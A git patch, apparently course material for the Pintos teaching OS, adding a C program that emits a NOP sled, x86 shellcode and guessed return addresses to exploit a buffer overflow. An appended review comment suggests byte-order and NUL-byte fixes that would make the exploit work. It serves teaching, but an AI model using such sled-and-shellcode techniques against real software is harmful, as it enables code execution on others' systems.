From e7bc50ca8ffcaa6ed68ebd2315f78b0f5a7d10ad Mon Sep 17 00:00:00 2001
From: klaar36
Date: Fri, 20 Mar 2015 17:30:24 +0100
Subject: Initial Pintos

---
 src/examples/noopsled.c | 44 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 src/examples/noopsled.c

(limited to 'src/examples/noopsled.c')

diff --git a/src/examples/noopsled.c b/src/examples/noopsled.c
new file mode 100644
index 0000000..d091d5d
--- /dev/null
+++ b/src/examples/noopsled.c
@@ -0,0 +1,44 @@
+/* klaar@ida
+
+ Program to generate a noop sled with accompanying shellcode and a
+ good guess as of where all of this data ends up when a buffer
+ overflow is exploited in pintos.
+
+ This program runs outside pintos. Pipe the output to a pintos
+ program with faulty buffer handling to exploit a buffer overflow.
+
+ gcc noopsled.c -o noopsled
+ */
+
+#include
+
+char shellcode[] =
+ "\x90\x90\x90\x90\x90\xe9\x0b\x00"
+ "\x00\x00\x6a\x02\xcd\x30\x31\xc0"
+ "\x50\x40\x50\xcd\x30\xe8\xf0\xff"
+ "\xff\xff""crack";
+
+char x86_nop = '\x90';
+
+unsigned guess = 0xc0000000 - 2000 - 300;
+
+int main() //int argc, char* argv[])
+{
+ int i;
+
+ for (i = 0; i < 128; ++i)
+ printf("%c", x86_nop);
+
+ for (i = 0; i < 32; ++i)
+ printf("%c", shellcode[i]);
+
+ for (i = 0; i < (128-32)/4; ++i)
+ {
+ char* g = (char*)&guess;
+ printf("%c", g[3]);
+ printf("%c", g[2]);
+ printf("%c", g[1]);
+ printf("%c", g[0]);
+ }
+ printf("\n\n");
+}
-- 
cgit v1.2.1
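Review bot: The address block in the third loop is emitted high byte first (`g[3]`, `g[2]`, `g[1]`, `g[0]`), but on a little-endian x86 host `g[0]` is the low byte of `guess`, and a saved return address on an x86 Pintos stack is stored little-endian too — so if the target copies the piped bytes into the overflowed buffer in stream order, the value that lands in EIP is the byte-reversed guess, not 0xBFFFF70C. Emitting `g[0]` through `g[3]` in ascending order, or simply `fwrite(&guess, sizeof guess, 1, stdout);`, keeps the host's byte order, which is what the generator appears to intend. Separately, the `#include` line is empty as shown, so the file cannot compile; presumably `<stdio.h>` was stripped in rendering, but the committed file should be checked. Note also that `shellcode` is 31 bytes plus its terminating NUL, so the 32-byte loop writes a `'\0'` at offset 159 — a target that reads its input with a string function would stop there, before the return-address block ever reaches the stack; a comment stating whether that NUL is deliberate would help the next reader.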